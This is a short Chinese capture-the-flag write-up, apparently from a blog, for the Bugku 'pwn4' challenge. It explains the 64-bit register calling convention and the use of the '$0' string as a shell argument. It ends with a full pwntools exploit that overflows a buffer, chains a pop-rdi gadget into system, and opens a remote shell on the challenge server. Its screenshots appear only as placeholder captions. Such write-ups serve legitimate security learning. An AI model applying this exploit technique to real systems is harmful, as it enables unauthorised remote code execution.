Bugku pwn4

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

找不到/bin/sh字符串,存在$0
在这里插入图片描述
在这里插入图片描述
这里因为64位程序与32位不同是通过寄存器传参的
在这里插入图片描述
思路,通过read函数溢出栈空间0x10大小,构造ROP链,调用system,通过rdi给system传参

exp

from pwn import *

p = remote('114.116.54.89' ,10004)

rop = 0x4007d3
_system = 0x400570
bin_sh = 0x60111f

p.recvuntil('Come on,try to pwn me')
payload = b'9' * (0x10 + 8) + p64(rop) + p64(bin_sh) + p64(_system) 
p.sendline(payload)
p.interactive()

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章